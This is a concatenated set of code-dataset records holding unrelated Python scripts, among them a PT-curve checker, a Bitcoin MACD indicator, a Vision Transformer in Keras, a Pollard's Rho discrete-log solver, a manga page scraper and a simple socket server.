Bot_pres\n\n def _check_up_or_under(self, fun, Temp, Pres):\n Get_Pres = fun(Temp)\n if Get_Pres > Pres:\n return 0 # 입력된 Pres가 그래프보다 아래쪽에 존재\n elif Get_Pres == Pres:\n return 1 # 입력된 Pres가 그래프에 존재\n else:\n return 2 # 입력된 Pres가 그래프보다 위쪽에 존재\n\n def _check_in_or_out(self, Temp, Pres):\n UpF, BotF = self._call_fun(Temp=Temp)\n Upcond = self._check_up_or_under(UpF, Temp, Pres)\n Botcond = self._check_up_or_under(BotF, Temp, Pres)\n\n Reason = 0\n if Upcond == 2: Reason = 1 # Upcond 벗어난 경우\n if Botcond == 0: Reason = 2 # Botcond 벗어난 경우\n\n if Upcond == 2 or Botcond == 0:\n return [1, Reason] # PT커브 초과\n else:\n return [0, Reason] # PT커브에서 운전 중\n\n def _check_distance(self, Temp, Pres):\n \"\"\"\n 현재 온도 압력을 기준으로 Upline과 Botline과의 거리 계산\n :param Temp: 현재 온도\n :param Pres: 현재 압력\n :return: UpDis, BotDis\n \"\"\"\n d = 0\n UpOrtF, BotOrtF = self._call_ort_fun(Temp=Temp) # [a,b,c]\n # d = abs(a*x_1 + b*y_1 + c) / (math.sqrt(math.pow(a, 2) + math.pow(b, 2)))\n # x_1 = Temp\n # y_1 = Pres\n UpDis = abs(UpOrtF[0] * Temp + UpOrtF[1] * Pres + UpOrtF[2]) / \\\n (math.sqrt(math.pow(UpOrtF[0], 2) + math.pow(UpOrtF[1], 2)))\n BotDis = abs(BotOrtF[0] * Temp + BotOrtF[1] * Pres + BotOrtF[2]) / \\\n (math.sqrt(math.pow(BotOrtF[0], 2) + math.pow(BotOrtF[1], 2)))\n return UpDis, BotDis\n\n def Check(self, Temp, Pres):\n \"\"\"\n PT curve에 운전 중인지 확인\n :param Temp: 현재 온도\n :param Pres: 현재 압력\n :return: 0 만족, 1 불만족\n \"\"\"\n return self._check_in_or_out(Temp, Pres)[0]\n\n def Check_Dis(self, Temp, Pres):\n \"\"\"\n 현재 온도 압력을 기준으로 PT 커브에서 벗어난 경우 벗어난 거리 제공\n :param Temp: 현재 온도\n :param Pres: 현재 압력\n :return: 벗어난 거리\n \"\"\"\n Satisfiy, Reason =self._check_in_or_out(Temp, Pres)\n Updis, Botdis = self._check_distance(Temp, Pres)\n\n if Satisfiy == 0:\n return 0\n else:\n # 가장 짧은 거리\n return Updis if Updis < Botdis else Botdis\n","sub_path":"TOOL/TOOL_PTCurve.py","file_name":"TOOL_PTCurve.py","file_ext":"py","file_size_in_byte":6407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"462474553","text":"\"\"\"\nMoving average convergence divergence (MACD)\nThis is another in the class of indicators that builds on top of moving averages of prices. This goes a step further than the APO.\n\nIt is similar in spirit to an absolute price oscillator in that it establishes the difference between a fast exponential moving average\nand a slow exponential moving average. However, in the case of MACD, we apply a smoothing exponential moving average to the MACD value\nitself in order to get the final signal output from the MACD indicator.\n\nOptionally, you may also look at the difference between MACD values and the EMA of the MACD values (signal) and visualize it as a histogram.\nA properly configured MACD signal can successfully capture the direction, magnitude, and duration of a trending instrument price.\n\"\"\"\nimport statistics as stats\nimport pandas as pd\nfrom pandas_datareader import data\nimport matplotlib.pyplot as plt\n\n# First day\nstart_date = '2014-01-01'\n# Last Day\nend_date = '2020-03-26'\n# download data\nbtc_data_all = data.DataReader('BTC-USD', 'yahoo', start_date, end_date)\n\nnum_periods_fast = 10 # fast EMA time period\nK_fast = 2 / (num_periods_fast + 1) # fast EMA smoothing factor\nema_fast = 0\n\nnum_periods_slow = 40 # slow EMA time period\nK_slow = 2 / (num_periods_slow + 1) # slow EMA smoothing factor\nema_slow = 0\n\nnum_periods_macd = 20 # MACD EMA time period\nK_macd = 2 / (num_periods_macd + 1) # MACD EMA smoothing factor\nema_macd = 0\n\nema_fast_values = [] # track fast EMA values for visualization purposes\nema_slow_values = [] # track slow EMA values for visualization purposes\nmacd_values = [] # track MACD values for visualization purposes\nmacd_signal_values = [] # MACD EMA values tracker\n\nmacd_histogram_values = [] # MACD - MACD-EMA\n\nfor close_price in btc_data_all.Close.values:\n if (ema_fast == 0): # first observation\n ema_fast = close_price\n ema_slow = close_price\n else:\n ema_fast = (close_price - ema_fast) * K_fast + ema_fast\n ema_slow = (close_price - ema_slow) * K_slow + ema_slow\n\n ema_fast_values.append(ema_fast)\n ema_slow_values.append(ema_slow)\n macd = ema_fast - ema_slow # MACD is fast_MA - slow_EMA\n\n if ema_macd == 0:\n ema_macd = macd\n else:\n ema_macd = (macd - ema_macd) * K_slow + ema_macd # signal is EMA of MACD values\n\n macd_values.append(macd)\n macd_signal_values.append(ema_macd)\n macd_histogram_values.append(macd - ema_macd)\n\nbtc_data_all = btc_data_all.assign(FastExponential10DayMovingAverage=pd.Series(ema_fast_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(SlowExponential40DayMovingAverage=pd.Series(ema_slow_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(MovingAverageConvergenceDivergence=pd.Series(macd_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(Exponential20DayMovingAverageOfMACD=pd.Series(macd_signal_values, index=btc_data_all.index))\nbtc_data_all = btc_data_all.assign(MACDHistorgram=pd.Series(macd_histogram_values, index=btc_data_all.index))\n\nema_f = btc_data_all['FastExponential10DayMovingAverage']\nema_s = btc_data_all['SlowExponential40DayMovingAverage']\nmacd = btc_data_all['MovingAverageConvergenceDivergence']\nema_macd = btc_data_all['Exponential20DayMovingAverageOfMACD']\nmacd_histogram = btc_data_all['MACDHistorgram']\n\nfig = plt.figure()\nax1 = fig.add_subplot(311, ylabel='BTC price in $')\nbtc_data_all.Close.plot(ax=ax1, color='g', lw=2., legend=True)\nema_f.plot(ax=ax1, color='b', lw=2., legend=True)\nema_s.plot(ax=ax1, color='r', lw=2., legend=True)\nax2 = fig.add_subplot(312, ylabel='MACD')\nmacd.plot(ax=ax2, color='black', lw=2., legend=True)\nema_macd.plot(ax=ax2, color='g', lw=2., legend=True)\nax3 = fig.add_subplot(313, ylabel='MACD')\nmacd_histogram.plot(ax=ax3, color='r', kind='bar', legend=True, use_index=False)\nplt.show()\n","sub_path":"Trading Signals/moving_average_convergence_divergence.py","file_name":"moving_average_convergence_divergence.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"403825220","text":"\"\"\"This is the subclass of Transform function for Argentina (LATAM division).\n\nWe will define transform functions specific to Argentina here.\n\nAuthor: Maicol Contreras\nLast Modified: October 28, 2020\n\"\"\"\n\nimport pandas as pd\n\nfrom constants import comp_harm_constants\nfrom transform_functions.common_comp_harm_transform_functions import CommonCompHarmTransformFunctions\n\n\nclass LatamArgentinaTransformFunctions(CommonCompHarmTransformFunctions):\n \"\"\"\n All custom (uncommon) transform functions **SPECIFIC to\n individual processing task** must be defined as part\n of this class.\n \"\"\"\n ARGENTINA_SPECIFIC_CATEGORY_MAPPINGS = {\n \"(?i).*PAÑO.*ABSORBENT.*\": \"Other\",\n \"(?i).*REHABILI.*\": \"Other\",\n \"(?i).*IND.*METAL.*\": \"Other\",\n \"(?i).*CLIN.*OFTALMO.*\": \"Other\",\n \"(?i).*ANTITRANS.*\": \"Other\",\n \"(?i).*LAB.*CLINICO.*\": \"Other\",\n \"(?i).*PEG.*PROT.*DEN.*\": \"Other\",\n \"(?i).*CTO.*ONCOLOGI.*\": \"Other\",\n \"(?i).*GREMIO.*ASOCIA.*\": \"Other\",\n \"(?i).*IND.*ELDOM.*ELE.*\": \"Other\",\n \"(?i).*IND.*CONS.*MASI.*\": \"Other\",\n \"(?i).*C.D.\\sSENSIBILIDAD.*\": \"Other\",\n \"(?i).*EPS.*\": \"Other\",\n \"(?i).*CLIN.*PSICOLOG.*\": \"Other\",\n \"(?i).*PESQUERA.*\": \"Other\",\n\n \"(?i).*LEJIA.*\": \"Home Care\",\n \n \"(?i).*CREM.*ESCALDA.*\": \"Personal Care\",\n \"(?i).*C.D.\\sMULTIBENE.*\": \"Personal Care\",\n \"(?i).*C.D.\\sBLANQUE.*\": \"Personal Care\",\n }\n\n def __init__(self, config):\n self.config = config\n\n def apply_country_specific_category_mapping_to_HARMONIZED_CATEGORY_column(self,\n df,\n existing_category_col_name: str,\n leave_empty_if_no_match = False\n ):\n \"\"\"\n Helper function to invoke the common comp harm function that will help us apply\n country-specific mappings for HARMONIZED_CATEGORY column.\n \"\"\"\n return self.add_HARMONIZED_CATEGORY_column_using_existing_category_column_with_country_specific_mappings(\n df,\n LatamArgentinaTransformFunctions.ARGENTINA_SPECIFIC_CATEGORY_MAPPINGS,\n existing_category_col_name,\n leave_empty_if_no_match\n )\n","sub_path":"data_architect_misc/data_transformer/transform_functions/latam_argentina_transform_functions.py","file_name":"latam_argentina_transform_functions.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"544674254","text":"import math\n\nradius = input()\nwhile radius:\n pennies = 0\n r2 = radius**2\n for x in xrange(1, radius+1):\n pennies += int(math.sqrt(r2 - x**2) + 1)\n pennies = 4 * pennies + 1\n print(int(pennies))\n radius = input()","sub_path":"DMOJ/ccc08s2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"298663690","text":"from snownlp import SnowNLP\nimport pandas as pd\nimport os\nfrom sqlalchemy import create_engine\n\n#设置需要分析文件\nyp = os.path.join(os.path.abspath(\".\"),\"cj1.txt\")\n#读取每条评论分别进行情感测试\nqg = []\npj = []\nfor dp in open(yp,encoding=\"utf-8\"):\n s = SnowNLP(dp)\n qg.append(s.sentiments)\n pj.append(dp)\n#将数据整理为dataframe\ntext = pd.DataFrame({'qinggan':qg,'duanping':pj})\n\n#入库\n\nengine = create_engine(\n \"mysql+pymysql://python:123456@14.14.14.20:3306/python?charset=utf8\",\n echo=True)\n\n\npd.io.sql.to_sql(text,'qgfx',con=engine,schema='python',if_exists='append')\nengine.dispose()\n\n\n\n\n","sub_path":"Week_05/G20200389010185/mysnow.py","file_name":"mysnow.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"358997007","text":"import turtle\r\nturtle.shape(\"turtle\")\r\nturtle.speed(\"fastest\")\r\nturtle.penup()\r\nturtle.goto(0, - 270)\r\nturtle.pendown()\r\n\r\n\r\ndef draw(collichestvo: int, razmer: int, first_color: int):\r\n for i in range(collichestvo):\r\n turtle.colormode(255)\r\n turtle.color(0, 0, first_color)\r\n turtle.begin_fill()\r\n turtle.circle(razmer)\r\n turtle.penup()\r\n turtle.lt(90)\r\n turtle.fd(razmer*2)\r\n turtle.rt(90)\r\n turtle.pendown()\r\n turtle.end_fill()\r\n razmer = razmer * 0.75\r\n first_color += 40\r\n turtle.begin_fill()\r\n turtle.fd(razmer)\r\n turtle.lt(110)\r\n turtle.fd(razmer * 1.5)\r\n turtle.lt(70)\r\n turtle.fd(razmer)\r\n turtle.lt(70)\r\n turtle.fd(razmer * 1.5)\r\n turtle.lt(110)\r\n turtle.fd(razmer)\r\n turtle.end_fill\r\n\r\n\r\ndraw(3, 100, 90)\r\nturtle.mainloop()\r\n","sub_path":"snowman_def.py","file_name":"snowman_def.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"177114082","text":"# coding=utf-8\nimport json\n\nfrom flask import jsonify, render_template,flash,redirect,url_for\n\nfrom app import app\nfrom app.main.service.Item_cardapio_service import Item_cardapio_service\nfrom app.main.models.Item_cardapio import Item_cardapio_dao\nfrom app.main.models.Produto import Produto_dao\nfrom app.main.forms.Item_cardapio_forms import Item_cardapio_forms\nfrom app.main.util import to_string\n\nservice = Item_cardapio_service()\n\n@app.route(\"/cardapio\")\ndef cardapio():\n return render_template(\"cardapio.html\")\n\n@app.route(\"/itemCardapio/list\")\ndef lista_Item_cardapio():\n service.findAll()\n page = {\n \"titles\": [\"Código\", \"Nome\", \"Produto\", \"Quantidade de produto\", \"Qtd. Itens Extra\", \"Valor\", \"Tipo\"],\n \"header\": \"Item do Cardapio\",\n \"table\": \"Itens Cadastrados no Cardapio\"\n }\n resultados = create_cols(service.findAll())\n return render_template(\"listar.html\", page=page, resultados=resultados)\n\n\n@app.route(\"/itemCardapio/cadastro\", methods=[\"GET\", \"POST\"])\ndef cadastro_item_cardapio():\n form = Item_cardapio_forms()\n form.produto.choices = [(row.id_produto, row.nome) for row in Produto_dao.findAll()]\n if form.is_submitted():\n item = Item_cardapio_dao(str(form.nome.data), form.valor.data, form.produto.data, form.qtd_ingrediente.data, form.qtd_item_extra.data, form.tipo_item.data)\n service.salvar(item)\n return render_template('cadastro_item_cardapio.html', form=form)\n\ndef create_cols(list):\n lista = []\n for i in range(len(list)):\n resultado = dict()\n resultado['col1'] = to_string(list[i].id_item_cardapio)\n resultado['col2'] = to_string(list[i].nome)\n resultado['col3'] = to_string(list[i].produto.nome)\n resultado['col4'] = to_string(list[i].qtd_ingrediente)\n resultado['col5'] = to_string(list[i].tipo_item)\n resultado['col6'] = to_string(list[i].valor)\n resultado['col7'] = to_string(list[i].tipo_item)\n lista.append(resultado)\n return lista","sub_path":"app/main/controllers/Item_cardapio_controller.py","file_name":"Item_cardapio_controller.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"214033658","text":"import requests\nimport urllib\nimport bs4\nimport json\n#opening the JSON dump in read form\nwith open('mpdict.json', 'rb') as fp:\n\tmpdict = json.load(fp)\nmanga = raw_input('Enter the name of the manga that you want to download from (Note:If the name has spaces in it, replace the spaces with hyphens): ')\nchapter = raw_input(\"Enter the chapter number that you want to download : \")\n#building the url from the input data\nurl = 'http://www.mangapanda.com/'+str(mpdict[manga][0])+'-'+str(int(mpdict[manga][1])+int(chapter))+'-1/'+str(manga)+'/chapter-'+str(chapter)+'.html'\n#this part the /'+str(manga)+'/ seems to not effect the url loading at all\nh = {'User-Agent':'Mozilla/5.0'}\nresponse = requests.get(url, headers=h)\nsoup = bs4.BeautifulSoup(response.text)\nlist = soup.select('option[value]')\n#link is the list of all the pages in the chapter\nlink = [i['value'] for i in list]\n#downloading the pages, they get saved into the working directory\nfor i in range(len(list)):\n\tpageres = requests.get('http://www.mangapanda.com'+link[i], headers=h)\n\tsoup = bs4.BeautifulSoup(pageres.text)\n\tlist = soup.select('img#img')\n\tname = list[0]['alt']\n\timglink = list[0]['src']\t\n\turllib.urlretrieve(imglink, name+'.jpg')\n\n\n","sub_path":"mangapandascraper.py","file_name":"mangapandascraper.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"503088345","text":"\"\"\"\nAuthor: Kaushik Bhimraj\nDesc: A slimmed down more efficient version of Broccoli\n Code checks whether a folder already exists or needs to be created.\n It will not create\n\"\"\"\n\nimport os\nfrom OldCode.Unit import stitch\nfrom distutils.dir_util import copy_tree\nimport numpy as np\nimport time\n\n\ndef prodfisses(drive, product, customer_name, customer_location, job_number, job_name):\n fis_folder_template = drive + '\\\\00_CN_(RENAME)_v3\\\\FIS\\\\Location\\\\Project_Name_Number'\n drive = drive + '\\\\'\n customer_folder = stitch(drive, customer_name)\n print(customer_name + '...' + customer_folder[1])\n try:\n os.makedirs(customer_folder[0] + product + '\\\\')\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n print(product + '...Already exists...')\n path1 = customer_folder[0] + product + '\\\\'\n\n location_folder = stitch(path1, customer_location)\n print(customer_location + ' ... ' + location_folder[1])\n\n try:\n os.makedirs(location_folder[0] + 'Master_Drawings')\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n print('Standards folder...Already exists...')\n else:\n pass\n\n job_name_replace = job_name.replace(' ', '_')\n job_name_title = job_name_replace.title()\n job0 = '44OP-' + job_number\n job = job0 + '_' + job_name_title\n\n new_path = location_folder[0] + job + '\\\\'\n try:\n os.mkdir(new_path)\n flag = 'Created...'\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n flag = 'Already exists...'\n\n print('Copying deployment package...')\n if flag == 'Created...':\n copy_tree(fis_folder_template, new_path)\n else:\n print('Job exists, contents will not be overwritten...')\n\n f = np.load(drive + \"00_CN_(RENAME)_v3\\\\JobList.npy\").item()\n f[job0] = new_path\n np.save(drive + \"00_CN_(RENAME)_v3\\\\JobList.npy\", f)\n print('Added data into database...')\n\n try:\n os.makedirs(path1 + 'Standards')\n except OSError:\n if OSError.errno != os.errno.EEXIST:\n print('Standards folder...Already exists...')\n else:\n pass\n text_file = open(drive + '00_CN_(RENAME)_v3\\\\EFSFolderHistory.txt', 'a')\n text_file.write(os.getlogin() + ' ' + product + ' ' + customer_name + ' ' + customer_location\n + ' ' + job_number + ' ' + job_name + ' ' + time.strftime(\"Time: %H:%M:%S Date: %m-%d-20%y\")\n + '\\n')\n print('User information saved...')\n return()\n\n","sub_path":"OldCode/ProdFIS.py","file_name":"ProdFIS.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"539324031","text":"# type: ignore\nimport tensorflow as tf\nfrom . import layers, utils\n\nCONFIG_B = {\n \"dropout\": 0.1,\n \"mlp_dim\": 3072,\n \"num_heads\": 12,\n \"num_layers\": 12,\n \"hidden_size\": 768,\n}\n\nCONFIG_L = {\n \"dropout\": 0.1,\n \"mlp_dim\": 4096,\n \"num_heads\": 16,\n \"num_layers\": 24,\n \"hidden_size\": 1024,\n}\n\nBASE_URL = \"https://github.com/faustomorales/vit-keras/releases/download/dl/\"\n\nWEIGHTS = {\n False: {\n \"B16\": (\n BASE_URL + \"ViT-B_16_imagenet21k.npz\",\n \"ViT-B_16_imagenet21k.npz\",\n ),\n \"B32\": (BASE_URL + \"ViT-B_32_imagenet21k.npz\", \"ViT-B_32_imagenet21k.npz\"),\n # We're using the fine-tuned weights here because the non-fine-tuned weights\n # are not available yet. See https://github.com/googlse-research/vision_transformer/issues/15\n \"L16\": (\n BASE_URL + \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n ),\n \"L32\": (BASE_URL + \"ViT-L_32_imagenet21k.npz\", \"ViT-L_32_imagenet21k.npz\"),\n },\n True: {\n \"B16\": (\n BASE_URL + \"ViT-B_16_imagenet21k+imagenet2012.npz\",\n \"ViT-B_16_imagenet21k+imagenet2012.npz\",\n ),\n \"B32\": (\n BASE_URL + \"ViT-B_32_imagenet21k+imagenet2012.npz\",\n \"ViT-B_32_imagenet21k+imagenet2012.npz\",\n ),\n \"L16\": (\n BASE_URL + \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n \"ViT-L_16_imagenet21k+imagenet2012.npz\",\n ),\n \"L32\": (\n BASE_URL + \"ViT-L_32_imagenet21k+imagenet2012.npz\",\n \"ViT-L_32_imagenet21k+imagenet2012.npz\",\n ),\n },\n}\n\n\ndef preprocess_inputs(X):\n \"\"\"Preprocess images\"\"\"\n return tf.keras.applications.imagenet_utils.preprocess_input(\n X, data_format=None, mode=\"tf\"\n )\n\n\ndef build_model(\n image_size: int,\n patch_size: int,\n num_layers: int,\n hidden_size: int,\n num_heads: int,\n mlp_dim: int,\n classes: int,\n dropout=0.1,\n activation=\"linear\",\n include_top=True,\n representation_size=None,\n):\n \"\"\"Build a ViT model.\n\n Args:\n image_size: The size of input images.\n patch_size: The size of each patch (must fit evenly in image_size)\n classes: optional number of classes to classify images\n into, only to be specified if `include_top` is True, and\n if no `weights` argument is specified.\n num_layers: The number of transformer layers to use.\n hidden_size: The number of filters to use\n num_heads: The number of transformer heads\n mlp_dim: The number of dimensions for the MLP output in the transformers.\n dropout_rate: fraction of the units to drop for dense layers.\n activation: The activation to use for the final layer.\n include_top: Whether to include the final classification layer. If not,\n the output will have dimensions (batch_size, hidden_size).\n representation_size: The size of the representation prior to the\n classification layer. If None, no Dense layer is inserted.\n \"\"\"\n assert image_size % patch_size == 0, \"image_size must be a multiple of patch_size\"\n x = tf.keras.layers.Input(shape=(image_size, image_size, 3))\n y = tf.keras.layers.Conv2D(\n filters=hidden_size,\n kernel_size=patch_size,\n strides=patch_size,\n padding=\"valid\",\n name=\"embedding\",\n )(x)\n y = tf.keras.layers.Reshape((-1, hidden_size))(y)\n y = layers.ClassToken(name=\"class_token\")(y)\n y = layers.AddPositionEmbs(name=\"Transformer/posembed_input\")(y)\n for n in range(num_layers):\n y, _ = layers.TransformerBlock(\n num_heads=num_heads,\n mlp_dim=mlp_dim,\n dropout=dropout,\n name=f\"Transformer/encoderblock_{n}\",\n )(y)\n y = tf.keras.layers.LayerNormalization(\n epsilon=1e-6, name=\"Transformer/encoder_norm\"\n )(y)\n y = tf.keras.layers.Lambda(lambda v: v[:, 0], name=\"ExtractToken\")(y)\n if representation_size is not None:\n y = tf.keras.layers.Dense(\n representation_size, name=\"pre_logits\", activation=\"tanh\"\n )(y)\n if include_top:\n y = tf.keras.layers.Dense(classes, name=\"head\", activation=activation)(y)\n return tf.keras.models.Model(inputs=x, outputs=y)\n\n\ndef load_pretrained(key, model, pretrained_top):\n \"\"\"Load model weights for a known configuration.\"\"\"\n origin, fname = WEIGHTS[pretrained_top][key]\n local_filepath = tf.keras.utils.get_file(fname, origin, cache_subdir=\"weights\")\n utils.load_weights_numpy(model, local_filepath, pretrained_top)\n\n\ndef vit_b16(\n image_size: int = 224,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-B16. All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_B,\n patch_size=16,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=768 if pretrained and not pretrained_top else None,\n )\n if pretrained:\n load_pretrained(key=\"B16\", model=model, pretrained_top=pretrained_top)\n return model\n\n\ndef vit_b32(\n image_size: int = 224,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-B32. All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_B,\n patch_size=32,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=768 if pretrained and not pretrained_top else None,\n )\n if pretrained:\n load_pretrained(key=\"B32\", model=model, pretrained_top=pretrained_top)\n return model\n\n\ndef vit_l16(\n image_size: int = 384,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-L16. All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_L,\n patch_size=16,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=None,\n )\n if pretrained:\n load_pretrained(key=\"L16\", model=model, pretrained_top=pretrained_top)\n return model\n\n\ndef vit_l32(\n image_size: int = 384,\n classes=1000,\n activation=\"linear\",\n include_top=True,\n pretrained=True,\n pretrained_top=True,\n):\n \"\"\"Build ViT-L32. All arguments passed to build_model.\"\"\"\n if pretrained_top:\n assert classes == 1000, \"Can only use pretrained_top if classes = 1000.\"\n assert include_top, \"Can only use pretrained_top with include_top.\"\n assert pretrained, \"Can only use pretrained_top with pretrained.\"\n model = build_model(\n **CONFIG_L,\n patch_size=32,\n image_size=image_size,\n classes=classes,\n activation=activation,\n include_top=include_top,\n representation_size=1024 if pretrained and not pretrained_top else None,\n )\n if pretrained:\n load_pretrained(key=\"L32\", model=model, pretrained_top=pretrained_top)\n return model\n","sub_path":"vit_keras/vit.py","file_name":"vit.py","file_ext":"py","file_size_in_byte":8026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"173225520","text":"from numthe import fast_exp\nfrom numthe import find_inverse_modulo_n\nfrom math import gcd\n\n\nclass PollardsRho:\n \"\"\"\n Pollard's Rho factoring algorithm\n \"\"\"\n def __init__(self, p, g, h):\n self.p = p\n self.g = g\n self.h = h\n\n def random_function(self, x, alpha, beta):\n \"\"\"\n Pollard's random function, described by Pollard\n Args:\n x: parameter of f()\n alpha: exponent for g\n beta: exponent for h\n Returns:\n randomized Pollard's function\n \"\"\"\n if 0 <= x % self.p < self.p/3.0:\n return (self.g * x) % self.p, (alpha + 1) % (self.p-1), beta % (self.p-1)\n\n elif self.p/3.0 <= x % self.p < 2*self.p/3.0:\n return fast_exp(x, 2, self.p), 2*alpha % (self.p-1), 2*beta % (self.p-1)\n\n else:\n return (self.h * x) % self.p, alpha % (self.p-1), (beta + 1) % (self.p-1)\n\n def find_collision(self):\n \"\"\"\n Runs the iterations to find the collision of the tail and the loop\n Returns:\n xi, x2i, for g -> alpha, beta, for h -> gamma, delta\n \"\"\"\n x, y = 1, 1\n alpha, beta, gamma, delta = 0, 0, 0, 0\n\n for i in range(0, 1000):\n # print(\"{}, X = {}, Y = {}, alp = {}, bet = {}, gam = {}, del = {}\"\n # .format(i, x, y, alpha, beta, gamma, delta))\n\n # define temporary y, gamma and delta to pass to the function again to obtain f(f(x))\n aux_y, aux_gamma, aux_delta = self.random_function(y, gamma, delta)\n y, gamma, delta = self.random_function(aux_y, aux_gamma, aux_delta)\n x, alpha, beta = self.random_function(x, alpha, beta)\n\n # if we find the collision, return all the variables\n if x == y:\n print(\"Collision found at iteration: {}, X = {}, Y = {}, alpha = {}, beta = {}, gamma = {}, delta = {}\"\n .format(i + 1, x, y, alpha, beta, gamma, delta))\n\n return x, y, alpha, beta, gamma, delta\n\n def compute(self):\n \"\"\"\n Computes the rest of the algorithm, based on the collision.\n Returns:\n the answer to the initial DLP problem\n \"\"\"\n p = self.p\n h = self.h\n g = self.g\n\n # run until we find the collision\n x, y, alpha, beta, gamma, delta = self.find_collision()\n\n # once we found the collision we assign the exponents of h and g\n g_exp = alpha - gamma + (p - 1)\n h_exp = delta - beta\n\n # now we need to find gcd(h_exp, p - 1) and\n # a such that: a * h_exp = gcd(h-exp, p - 1)\n # here if gcd is 1 then a is just an inverse of exponent of h mod p-1\n a = gcd(h_exp, p - 1) * find_inverse_modulo_n(h_exp, p - 1) % (p - 1)\n\n # reassign the exponents of h and g multiplying both by a\n g_exp = g_exp * a % (p - 1)\n h_exp = h_exp * a % (p - 1)\n\n # divide the exponent of h and p - 1 by gcd(h_exp, p-1)\n j = g_exp / gcd(h_exp, p - 1)\n k = (p - 1) / gcd(h_exp, p - 1)\n\n # form an empty array\n array = list()\n # find the values to raise g into\n for i in range(0, gcd(h_exp, p - 1)):\n array.append(int(j + k * i))\n\n # raise g into the powers and check which is equal to h\n for number in array:\n if fast_exp(g, number, p) == h:\n # return the exponent which is the answer to the DLP\n return number\n\n\ndef main():\n\n # initial data\n g = 19\n h = 24717\n p = 48611\n\n # instantiate the algorithm\n pollards = PollardsRho(p, g, h)\n x = pollards.compute()\n\n print(\"x = {}\".format(x))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Pollard's Rho Factoring Algorithm/pollardsrho.py","file_name":"pollardsrho.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"391571542","text":"import socket\nimport threading\n\n\nclass BaseServer:\n\n def __init__(self):\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n def start(self, host, port, handler_builder):\n self.sock.bind((host, port))\n self.sock.listen()\n\n try:\n while True:\n (client, address) = self.sock.accept()\n client.settimeout(30)\n handler = handler_builder(client, address)\n t = threading.Thread(target=handler.handle)\n t.start()\n\n except KeyboardInterrupt:\n self.sock.shutdown(socket.SHUT_WR)\n self.sock.close()\n","sub_path":"server/base_server.py","file_name":"base_server.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"303798256","text":"# Three stones are on a number line at positions a, b, and c.\n\n# Each turn, you pick up a stone at an endpoint (ie., either the lowest or highest position stone), and move it to an unoccupied position between those endpoints. Formally, let's say the stones are currently at positions x, y, z with x < y < z. You pick up the stone at either position x or position z, and move that stone to an integer position k, with x < k < z and k != y.\n\n# The game ends when you cannot make any more moves, ie. the stones are in consecutive positions.\n\n# When the game ends, what is the minimum and maximum number of moves that you could have made? Return the answer as an length 2 array: answer = [minimum_moves, maximum_moves]\n\n \n\n# Example 1:\n\n# Input: a = 1, b = 2, c = 5\n# Output: [1,2]\n# Explanation: Move the stone from 5 to 3, or move the stone from 5 to 4 to 3.\n\n# Example 2:\n\n# Input: a = 4, b = 3, c = 2\n# Output: [0,0]\n# Explanation: We cannot make any moves.\n\n# Example 3:\n\n# Input: a = 3, b = 5, c = 1\n# Output: [1,2]\n# Explanation: Move the stone from 1 to 4; or move the stone from 1 to 2 to 4.\n\n 